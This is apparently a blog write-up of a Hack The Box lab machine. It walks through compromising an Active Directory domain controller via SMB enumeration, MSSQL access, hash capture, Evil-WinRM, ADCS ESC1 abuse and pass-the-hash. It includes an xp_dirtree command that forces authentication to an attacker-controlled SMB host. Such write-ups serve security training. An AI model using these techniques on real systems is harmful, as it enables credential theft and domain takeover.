Enumeration

Nmap

Nmap scan results showed services like LDAP and Kerberos, which are commonly used in Active Directory. This indicates the target is likely a Domain Controller.

00 - nmap output

SMB

After enumerating SMB shares, I discovered a non-standard share named Public, which contained a readable PDF file related to SQL procedures.

01 - smbclient

The SQL Procedures file contained credentials for a guest user, which allowed us to authenticate to the MSSQL service.

02 - sql procedures pdf

Exploitation

Getting Service Account

To retrieve the service account running MSSQL, I set up an SMB server locally and executed the following command on the database: EXEC master.sys.xp_dirtree ‘\10.10.14.8\smbshare’, 1, 1;

03 - auth to smb

As a result, I captured the NetNTLMv2 hash on my SMB server.

04 - sql_svc

I then proceeded to crack the captured hash.

05 - start crack

06 - cracked

Getting User

Using the service account credentials, I performed credential harvesting and discovered user credentials stored within the SQL Server logs.

07 - ryan password on logs

I then gained user access via Evil-WinRM, as the WinRM service was open.

08 - got the user

Privilege Escalation

ADCS - ESC1

After gaining access to the user account, I was initially unsure how to proceed. Upon reviewing the hint, I realized that the environment had a vulnerable Active Directory Certificate Services (ADCS) setup. I then used Certipy to enumerate the ADCS configuration and identified an ESC1 (Enrollment Services Configuration #1) vulnerability.

09 - certipy linux

10 - certificate template

From there, the process was straightforward: I impersonated the Administrator account to request an ADCS certificate, then used that certificate to obtain a Kerberos Ticket Granting Ticket (TGT) encrypted with the Administrator’s NTLM hash, which I then extracted to recover the Administrator hash.

11 - request

12 - hash

Finally, I executed a pass-the-hash attack with Evil‑WinRM and obtained an Administrator shell.

13 - got it

At that point, the machine was fully compromised.

pwned

For more information about ADCS Privilege Escalation checkout below links:

  • https://www.nccgroup.com/us/research-blog/defending-your-directory-an-expert-guide-to-fortifying-active-directory-certificate-services-adcs-against-exploitation/
  • https://abrictosecurity.com/pentesting-active-directory-certificate-services-adcs-esc1-esc8/
<
Previous Post
Forest - Hack The Box
>
Next Post
Sauna - Hack The Box